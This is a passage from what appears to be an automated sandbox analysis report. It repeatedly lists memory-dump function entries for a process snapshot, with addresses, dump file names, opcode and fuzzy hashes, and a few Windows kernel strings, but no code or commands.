                                          • Associated: 00000007.00000002.363230284.0000000000820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000910000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000920000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000924000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000927000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_820000_twbcaze.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ac83c10758ebe8d5f76978585b10c9c6dce2ba331d146511a487ba092cee0476
                                          • Instruction ID: b97e0867cf63cce6a7bd091cca7d2f61d4937398616a74d9d7050cc2a0bd1794
                                          • Opcode Fuzzy Hash: ac83c10758ebe8d5f76978585b10c9c6dce2ba331d146511a487ba092cee0476
                                          • Instruction Fuzzy Hash: E8B01272180540CBE3199718E906F5FB710FB90F00F00C93EA00781C50DA389D3CD446
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00841148 Relevance: .0, Instructions: 6COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.363230284.0000000000830000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: true
                                          • Associated: 00000007.00000002.363230284.0000000000820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000910000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000920000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000924000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000927000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_820000_twbcaze.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a1a4eb0b16b3dbbf7110758f456c9aa6f179838dd1f90225a28a8369ad29a59d
                                          • Instruction ID: 165250f8074bc0ef9cdc504fa449021ea13c8322197c03fc884fef66fc1cad38
                                          • Opcode Fuzzy Hash: a1a4eb0b16b3dbbf7110758f456c9aa6f179838dd1f90225a28a8369ad29a59d
                                          • Instruction Fuzzy Hash: 23B01272140580C7E31D9718D906B5B7610FB80F00F008D3AA04781CA1DBB89A2CE44A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0083F8CC Relevance: .0, Instructions: 6COMMONLIBRARYCODE
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.363230284.0000000000830000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: true
                                          • Associated: 00000007.00000002.363230284.0000000000820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000910000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000920000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000924000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000927000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_820000_twbcaze.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 33242f20aaab27225aff268df6c25d5fe4c2b5540d13ace685107ef1cdf40795
                                          • Instruction ID: b608c8617bc096b37df9be2f0bc93e64f466faa20b7dbfb3ee59c54b4bfc8c85
                                          • Opcode Fuzzy Hash: 33242f20aaab27225aff268df6c25d5fe4c2b5540d13ace685107ef1cdf40795
                                          • Instruction Fuzzy Hash: EBB01275100540C7F304D704D905F4AB311FBD0F04F40893AE40786591D77EAD28C697
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00841930 Relevance: .0, Instructions: 6COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.363230284.0000000000830000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: true
                                          • Associated: 00000007.00000002.363230284.0000000000820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000910000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000920000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000924000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000927000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_820000_twbcaze.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 24bb0b37ea7353fce174200a7558970e7d293f02c0796de48d820b1db3e8008e
                                          • Instruction ID: 3aeeca65ea1aaf37b62c9893cb2d02334d47a3b29990fed3fb0e6cbc500f1d8d
                                          • Opcode Fuzzy Hash: 24bb0b37ea7353fce174200a7558970e7d293f02c0796de48d820b1db3e8008e
                                          • Instruction Fuzzy Hash: 52B01272100940C7E34AA714DE07B8BB210FBD0F01F00893BA04B85D50D638A92CC546
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0083F938 Relevance: .0, Instructions: 6COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.363230284.0000000000830000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: true
                                          • Associated: 00000007.00000002.363230284.0000000000820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000910000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000920000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000924000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000927000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_820000_twbcaze.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4f2cab816673a0835cc858cab12777882f58cc76e03a07139f76655cd686d1a0
                                          • Instruction ID: d523cc507bde657408e54325c2dcaf12b60df831943b7985b4c6fe4931788f26
                                          • Opcode Fuzzy Hash: 4f2cab816673a0835cc858cab12777882f58cc76e03a07139f76655cd686d1a0
                                          • Instruction Fuzzy Hash: FCB0927220194087E2099B04D905B477251EBC0B01F408934A50646590DB399928D947
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0083FAB8 Relevance: .0, Instructions: 6COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.363230284.0000000000830000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: true
                                          • Associated: 00000007.00000002.363230284.0000000000820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000910000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000920000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000924000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000927000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_820000_twbcaze.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                          • Instruction ID: c22cab920426f99211259bec297b66dc94c7f77789dfa39603ac798b5fdced38
                                          • Opcode Fuzzy Hash: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                          • Instruction Fuzzy Hash: 66B01272100544C7E349B714D906B8B7210FF80F00F00893AA00782861DB389A2CE996
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0083FA20 Relevance: .0, Instructions: 6COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.363230284.0000000000830000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: true
                                          • Associated: 00000007.00000002.363230284.0000000000820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000910000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000920000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000924000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000927000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_820000_twbcaze.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: dd081996be218738afd9aebd029b97e59d15eb89e01646829fdeee62bde327fa
                                          • Instruction ID: 9b5f4fb9875c6876c932e4128e9800c708acc4d40f0b969179b44b3e8b2884d0
                                          • Opcode Fuzzy Hash: dd081996be218738afd9aebd029b97e59d15eb89e01646829fdeee62bde327fa
                                          • Instruction Fuzzy Hash: 4FB01272100580C7E30D9714D90AB4B7210FB80F00F00CD3AA00781861DB78DA2CD45A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0083FA50 Relevance: .0, Instructions: 6COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.363230284.0000000000830000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: true
                                          • Associated: 00000007.00000002.363230284.0000000000820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000910000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000920000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000924000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000927000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_820000_twbcaze.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a404d463d6f8697e12459a80a2071a15e1bd5ec6cf7fed7c99dd07a5c51de8f6
                                          • Instruction ID: 2cae8b11bd858d750de1a79d340ce6dfe3ec44f87311ce0e8d0be64a47f0ebf6
                                          • Opcode Fuzzy Hash: a404d463d6f8697e12459a80a2071a15e1bd5ec6cf7fed7c99dd07a5c51de8f6
                                          • Instruction Fuzzy Hash: 9BB01272100544C7E349A714DA07B8B7210FB80F00F008D3BA04782851DFB89A2CE986
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0083FBE8 Relevance: .0, Instructions: 6COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.363230284.0000000000830000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: true
                                          • Associated: 00000007.00000002.363230284.0000000000820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000910000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000920000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000924000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000927000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_820000_twbcaze.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c324cfac0bc47b069c1788d5b946c83edf7c28d4d9dcf1ed0d5a02e7884c4d21
                                          • Instruction ID: 9452a8d0b0f104eb9e4922b1c8778681c83a3ee0f3d85b1ffb0a7dc5c1b1eaf2
                                          • Opcode Fuzzy Hash: c324cfac0bc47b069c1788d5b946c83edf7c28d4d9dcf1ed0d5a02e7884c4d21
                                          • Instruction Fuzzy Hash: 9AB01272100640C7E349A714DA0BB5B7210FB80F00F00893BE00781852DF389A2CD986
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0083FB50 Relevance: .0, Instructions: 6COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.363230284.0000000000830000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: true
                                          • Associated: 00000007.00000002.363230284.0000000000820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000910000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000920000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000924000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000927000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_820000_twbcaze.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                          • Instruction ID: 24e1bc86294fbd7a1654c33a96a754a721993c998c3fcb69f8e89524a52cb594
                                          • Opcode Fuzzy Hash: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                          • Instruction Fuzzy Hash: 54B01272201544C7E3099B14D906F8B7210FB90F00F00893EE00782851DB38D92CE447
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0083FC30 Relevance: .0, Instructions: 6COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.363230284.0000000000830000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: true
                                          • Associated: 00000007.00000002.363230284.0000000000820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000910000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000920000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000924000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000927000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_820000_twbcaze.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5d06e62ecc0ccff2d82fb33389f73f013fdf3a2f5ea46d36b3417402e9c0144c
                                          • Instruction ID: bea31e52b4947098166a5853b381437c0ce687cada8622438d1654f6fc3cd67c
                                          • Opcode Fuzzy Hash: 5d06e62ecc0ccff2d82fb33389f73f013fdf3a2f5ea46d36b3417402e9c0144c
                                          • Instruction Fuzzy Hash: B2B01272140540C7E3099714DA1AB5B7210FB80F00F008D3AE04781891DB7C9A2CD486
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0083FC48 Relevance: .0, Instructions: 6COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.363230284.0000000000830000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: true
                                          • Associated: 00000007.00000002.363230284.0000000000820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000910000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000920000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000924000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000927000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_820000_twbcaze.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5f2af904bd49f46abffdb2c3bdfb425abd6ec71f3c15e3442cbf597b06952ad7
                                          • Instruction ID: ba27d4cd5f553268e31cb600e7e3d5a3e50323ff6ed211678ad30f7188510e08
                                          • Opcode Fuzzy Hash: 5f2af904bd49f46abffdb2c3bdfb425abd6ec71f3c15e3442cbf597b06952ad7
                                          • Instruction Fuzzy Hash: 39B01272100540C7E319A714D90AB5B7250FF80F00F00893AE10781861DB38992CD456
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00841D80 Relevance: .0, Instructions: 6COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.363230284.0000000000830000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: true
                                          • Associated: 00000007.00000002.363230284.0000000000820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000910000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000920000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000924000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000927000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_820000_twbcaze.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 18add7eb1c2e7e0a1a3b96ba9e1590d2475205760e881687e9c53b2b1b4fe652
                                          • Instruction ID: c40cb18f784fb740092d7f35057b9839572fe11e4001cfe90af8ac8386c88b07
                                          • Opcode Fuzzy Hash: 18add7eb1c2e7e0a1a3b96ba9e1590d2475205760e881687e9c53b2b1b4fe652
                                          • Instruction Fuzzy Hash: A6B09271508A40C7E204A704D985B46B221FB90B00F408938A04B865A0D72CA928C686
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0083FD5C Relevance: .0, Instructions: 6COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.363230284.0000000000830000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: true
                                          • Associated: 00000007.00000002.363230284.0000000000820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000910000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000920000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000924000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000927000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_820000_twbcaze.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 41f935964cbdc9d6e59f893e4d9d45654507f6024dc22a4db73dc1be4add7f46
                                          • Instruction ID: 152fdd420af7dfcc6df86c72954370e6eab1db85fd0a81c34441345ed48de2b3
                                          • Opcode Fuzzy Hash: 41f935964cbdc9d6e59f893e4d9d45654507f6024dc22a4db73dc1be4add7f46
                                          • Instruction Fuzzy Hash: 27B01272141540C7E349A714D90AB6B7220FB80F00F00893AE00781852DB389B2CD98A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0083FE24 Relevance: .0, Instructions: 6COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.363230284.0000000000830000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: true
                                          • Associated: 00000007.00000002.363230284.0000000000820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000910000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000920000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000924000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000927000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_820000_twbcaze.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2e7bb4dc02deca6488bcbd727a6b6eb413310111d5b181e4d110d688bd4fe620
                                          • Instruction ID: 4523e9276363b51c29093556ee00c3605be97a6a096d126b10744d78506899f7
                                          • Opcode Fuzzy Hash: 2e7bb4dc02deca6488bcbd727a6b6eb413310111d5b181e4d110d688bd4fe620
                                          • Instruction Fuzzy Hash: E7B012B2104580C7E31A9714D906B4B7210FB80F00F40893AA00B81861DB389A2CD456
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0083FFFC Relevance: .0, Instructions: 6COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.363230284.0000000000830000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: true
                                          • Associated: 00000007.00000002.363230284.0000000000820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000910000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000920000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000924000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000927000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_820000_twbcaze.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 975dfa9cf9b8080f9d0320802deb543160739c3189efc7d7e2a617800603798d
                                          • Instruction ID: 5af6445773ea8696aa9cd62fdf5509cf1cb9f7b4cf56a5a77559796e3d2133fe
                                          • Opcode Fuzzy Hash: 975dfa9cf9b8080f9d0320802deb543160739c3189efc7d7e2a617800603798d
                                          • Instruction Fuzzy Hash: 07B012B2240540C7E30D9714D906B4B7250FBC0F00F00893AE10B81850DA3C993CC44B
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0083FF34 Relevance: .0, Instructions: 6COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.363230284.0000000000830000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: true
                                          • Associated: 00000007.00000002.363230284.0000000000820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000910000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000920000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000924000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000927000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_820000_twbcaze.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6e5e409cf338bac94f49896e83b2b8a287e5016741aed655f6c9dd643cd52d5d
                                          • Instruction ID: c0177d7ad0d10355b3c7d2619bc7f24452a3c2aab25a1a733e07692cdee9b307
                                          • Opcode Fuzzy Hash: 6e5e409cf338bac94f49896e83b2b8a287e5016741aed655f6c9dd643cd52d5d
                                          • Instruction Fuzzy Hash: B1B012B2200540C7E319D714D906F4B7210FB80F00F40893AB10B81862DB3C992CD45A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00868788 Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 431COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          • Kernel-MUI-Language-SKU, xrefs: 008689FC
                                          • Kernel-MUI-Number-Allowed, xrefs: 008687E6
                                          • WindowsExcludedProcs, xrefs: 008687C1
                                          • Kernel-MUI-Language-Disallowed, xrefs: 00868914
                                          • Kernel-MUI-Language-Allowed, xrefs: 00868827
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.363230284.0000000000830000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: true
                                          • Associated: 00000007.00000002.363230284.0000000000820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000910000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000920000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000924000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000927000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_820000_twbcaze.jbxd
                                          Similarity
                                          • API ID: _wcspbrk
